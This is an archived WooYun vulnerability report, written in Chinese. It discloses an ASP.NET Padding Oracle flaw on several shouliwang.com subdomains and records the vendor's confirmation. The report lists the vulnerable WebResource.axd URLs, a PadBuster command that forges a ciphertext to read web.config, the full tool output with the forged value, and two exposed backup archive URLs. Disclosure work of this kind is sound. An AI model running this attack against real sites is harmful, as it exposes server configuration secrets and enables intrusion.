当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117570

漏洞标题:手礼网多站存在Padding Oracle Vulnerability信息泄露漏洞(附过程)

相关厂商:shouliwang.com

漏洞作者:

提交时间:2015-06-02 09:52

修复时间:2015-07-18 10:38

公开时间:2015-07-18 10:38

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-03: 厂商已经确认,细节仅向厂商公开
2015-06-13: 细节向核心白帽子及相关领域专家公开
2015-06-23: 细节向普通白帽子公开
2015-07-03: 细节向实习白帽子公开
2015-07-18: 细节向公众公开

简要描述:

**

详细说明:

http://bbs.shouliwang.com/WebResource.axd?d=1433135288
http://fz.shouliwang.com/WebResource.axd?d=1433137211
http://my.shouliwang.com/WebResource.axd?d=1433135193
http://pic.shouliwang.com/WebResource.axd?d=1433135962
http://shouliwang.com/WebResource.axd?d=1433135132
http://wys.shouliwang.com/WebResource.axd?d=1433137108
http://www.shouliwang.com/WebResource.axd?d=1433135907


均存在
已主站为例:

22.png


C:\>2.pl http://www.shouliwang.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 9MB
wmxN6TLKjC8S3CdFGyw2 16 -encoding 3 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 500
[+] Location: N/A
[+] Content Length: 5013
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 3877 N/A
2 ** 255 500 5013 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (20) [Byte 16]
[+] Success: (141) [Byte 15]
[+] Success: (95) [Byte 14]
[+] Success: (121) [Byte 13]
[+] Success: (209) [Byte 12]
[+] Success: (136) [Byte 11]
[+] Success: (250) [Byte 10]
[+] Success: (207) [Byte 9]
[+] Success: (136) [Byte 8]
[+] Success: (241) [Byte 7]
[+] Success: (83) [Byte 6]
[+] Success: (139) [Byte 5]
[+] Success: (38) [Byte 4]
[+] Success: (184) [Byte 3]
[+] Success: (66) [Byte 2]
[+] Success: (198) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): aa31ca55a82f9ee3e99ee1ba1b35e814
[+] Intermediate Bytes (HEX): d64db62b8758fb81c7fd8ed47d5c8f15
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: qjHKVagvnuPpnuG6GzXoFAAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------


获得第一层秘钥为qjHKVagvnuPpnuG6GzXoFAAAAAAAAAAAAAAAAAAAAAA1
获取第二层的时候比较慢,我就不跑了

漏洞证明:

附带两处下载:
◾http://pic.shouliwang.com/giftimages.zip
◾http://bbs.shouliwang.com/bbs.rar

修复方案:

**

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-06-03 10:36

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-06-02 09:56 | kydhzy ( 普通白帽子 | Rank:362 漏洞数:62 | 软件测试)

    英文的我看不懂